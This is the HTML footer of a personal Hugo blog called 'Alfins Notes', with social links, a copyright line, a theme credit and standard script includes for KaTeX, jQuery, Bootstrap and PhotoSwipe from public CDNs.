		
		  <a href="https://github.com/AlfinJ0se/" title="GitHub">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-github fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://twitter.com/Alfinjoseph19" title="Twitter">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-twitter fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
              <li>
		
		  <a href="https://discord.gg/alfin3133" title="Discord">
		
                  <span class="fa-stack fa-lg">
                    <i class="fas fa-circle fa-stack-2x"></i>
                    <i class="fab fa-discord fa-stack-1x fa-inverse"></i>
                  </span>
                </a>
              </li>
          
        </ul>
        <p class="credits copyright text-muted">
          
            
              <a href="https://Alfinj0se.github.io">Alfin Joseph</a>
            
          

          &nbsp;&bull;&nbsp;&copy;
          
            2024
          

          
            &nbsp;&bull;&nbsp;
            <a href="https://Alfinj0se.github.io/">Alfins Notes</a>
          
        </p>
        
        <p class="credits theme-by text-muted">
          <a href="https://gohugo.io">Hugo v0.126.1</a> powered &nbsp;&bull;&nbsp; Theme <a href="https://github.com/halogenica/beautifulhugo">Beautiful Hugo</a> adapted from <a href="https://deanattali.com/beautiful-jekyll/">Beautiful Jekyll</a>
          
        </p>
      </div>
    </div>
  </div>
</footer><script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/katex.min.js" integrity="sha384-G0zcxDFp5LWZtDuRMnBkk3EphCK1lhEf4UEyEM693ka574TZGwo4IWwS6QLzM/2t" crossorigin="anonymous"></script>
<script defer src="https://cdn.jsdelivr.net/npm/katex@0.16.7/dist/contrib/auto-render.min.js" integrity="sha384-+VBxd3r6XgURycqtZ117nYw44OOcIax56Z4dCRWbxyPt0Koah1uHoK0o4+/RRE05" crossorigin="anonymous" onload="renderMathInElement(document.body);"></script>
<script src="https://code.jquery.com/jquery-3.7.0.slim.min.js" integrity="sha384-w5y/xIeYixWvfM+A1cEbmHPURnvyqmVg5eVENruEdDjcyRLUSNej7512JQGspFUr" crossorigin="anonymous"></script>
<script src="https://cdn.jsdelivr.net/npm/bootstrap@3.4.1/dist/js/bootstrap.min.js" integrity="sha384-aJ21OjlMXNL5UyIl/XNwTMqvzeRMZH2w8c5cRVpzpU8Y5bApTppSuUkhZXN0VxHd" crossorigin="anonymous"></script>

<script src="https://Alfinj0se.github.io/js/main.js"></script><script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe.min.js" integrity="sha384-QELNnmcmU8IR9ZAykt67vGr9/rZJdHbiWi64V88fCPaOohUlHCqUD/unNN0BXSqy" crossorigin="anonymous"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/photoswipe/4.1.2/photoswipe-ui-default.min.js" integrity="sha384-m67o7SkQ1ALzKZIFh4CiTA8tmadaujiTa9Vu+nqPSwDOqHrDmxLezTdFln8077+q" crossorigin="anonymous"></script><script src="https://Alfinj0se.github.io/js/load-photoswipe.js"></script>









    
  </body>
</html>

